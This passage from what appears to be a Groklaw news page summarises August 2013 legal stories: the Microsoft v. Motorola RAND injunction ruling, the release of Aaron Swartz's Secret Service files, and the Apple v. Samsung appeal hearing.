As discussed above, in certain circumstances seeking injunctive relief may constitute a breach of the RAND commitment, whereas in other circumstances such conduct may be proper. The timing of when a party seeks injunctive relief in a separate forum relative to a pending action is germane to whether that party acted in bad faith in seeking such relief. In other words, it may very well be the case that seeking injunctive relief absent a pending lawsuit is good faith, whereas seeking the same relief during the pendency of litigation over a RAND rate is bad faith.

So it's up to the jury. He has, therefore, denied Microsoft's motion asking him to rule that Motorola violated its duty of good faith, because, he says, "there are numerous disputed issues of material fact precluding summary judgment on Microsoft's claim that Motorola violated its good faith duty." So it has to go to a jury. What does it mean? It means that the Microsoft/Apple attempt to get courts to rule that FRAND patent owners can't ever seek injunctions has failed. This court was Microsoft's best chance to win on that, and it lost.
Full report - 08/12/13 First 104 pages of Aaron Swartz Secret Service File Released - Who is the female on page 97? ~pj
Kevin Poulsen at Wired reports that the first 104 pages of Aaron Swartz's Secret Service files are available now, with a lot more to come, as a result of court ordered release. There are apparently 14,500 more pages to come.
Look at page 97. It's redacted so the identity of the woman is kept confidential, but it appears from the notation that a woman was in contact with authorities and informing them of conversations between her and Swartz.
Full report - 08/09/13 Reports from the Apple v. Samsung Appeal Hearing ~pj - Updated 8Xs - Audio
Today was the day Apple's appeal of Judge Lucy Koh's refusal to issue an injunction against Samsung was scheduled at the US Court of Appeals for the Federal Circuit in Washington, DC. And Groklaw had two volunteers there. The first report is in, and we expect Webster to send in his report next. Groklaw's RFD has the framework of how it went, but he confesses he couldn't predict the outcome.
Full report